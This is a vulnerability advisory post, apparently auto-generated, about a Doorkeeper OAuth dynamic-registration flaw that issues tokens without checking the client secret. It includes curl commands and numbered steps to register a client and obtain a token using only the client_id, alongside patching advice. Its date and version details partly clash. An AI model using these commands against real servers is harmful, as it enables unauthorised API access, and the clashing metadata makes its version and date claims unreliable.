Doorkeeper, Credential Bypass Vulnerability, CVE-Unknown (Medium) -DC-Jun2026-217

By /

Listen to this Post

Intro to How This CVE Works:

The `DynamicClientRegistrationControllerregister` action in the Doorkeeper OAuth provider hard-codes `confidential: false` when dynamically registering new OAuth client applications. However, the server responds with a valid `client_secret` and advertises token_endpoint_auth_methods_supported: ["client_secret_basic", "client_secret_post"]—implying the client is confidential and requires a secret for authentication.
This mismatch creates a credential bypass. Doorkeeper’s `Application.by_uid_and_secret` method considers a missing or blank client secret as valid for non-confidential (public) clients. Therefore, an attacker who knows only the publicly exposed `client_id` of a dynamically registered application can authenticate to the token endpoint without providing a secret.
Because the server falsely treats the client as confidential but never validates the secret, the attacker is granted a valid access token. The vulnerability is limited to projects that have explicitly enabled the optional dynamic client registration feature.

DailyCVE Form:

Platform: Doorkeeper
Version: <1.10.0
Vulnerability: Credential Bypass
Severity: Medium
Date: 2017-03-14 (approx.)

Prediction: Already patched (1.10.0)

What Undercode Say:

Enable dynamic client registration in the Doorkeeper initializer:
Doorkeeper.configure do
... other config ...
enable_dynamic_client_registration true
end
Register a new client using the dynamic registration endpoint:
curl -X POST https://target.com/oauth/registration \
-d "client_name=EvilApp" \
-d "redirect_uris=https://evil.com/callback" \
-d "scope=read write"
Observe the response includes client_id, client_secret, and the misleading token_endpoint_auth_methods_supported list.
Exploit: use only the client_id to obtain an access token:
curl -X POST https://target.com/oauth/token \
-d "grant_type=client_credentials" \
-d "client_id=THE_CLIENT_ID_FROM_REGISTRATION"
The token endpoint issues an access token without verifying the client_secret.

Exploit:

  1. Identify the dynamic client registration endpoint on the target Doorkeeper provider.
  2. Register a new OAuth client (e.g., via POST /oauth/registration).
  3. Capture the returned `client_id` (the `client_secret` is ignored for the exploit).
  4. Request an access token using only the `client_id` in the `client_credentials` grant.
  5. The token endpoint fails to reject the missing secret because the application was incorrectly marked as non-confidential (confidential: false), despite the server’s expectations.
  6. Use the issued access token to access protected resources as the registered client.

Protection:

  • Immediate Upgrade: Update to Doorkeeper version 1.10.0 or later, which includes the patch for this vulnerability.
  • Workaround for Existing Deployments: Manually update the `confidential` flag for all applications that were created via dynamic client registration. Set `confidential: true` to enforce secret validation.
  • Disable Dynamic Registration: If not strictly needed, disable the dynamic client registration feature in the Doorkeeper initializer (enable_dynamic_client_registration false).
  • Audit Existing Clients: Review all OAuth applications in the system to ensure they are correctly flagged as confidential or public based on their actual security properties.

Impact:

Successful exploitation allows an attacker to bypass client authentication entirely for dynamically registered applications. Using only the publicly known client_id, the attacker can obtain valid OAuth access tokens, impersonate the legitimate client, and access any resources or APIs that the client is authorized to use. This undermines the security of the OAuth authorization server and can lead to data breaches, privilege escalation, and lateral movement within the application ecosystem.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top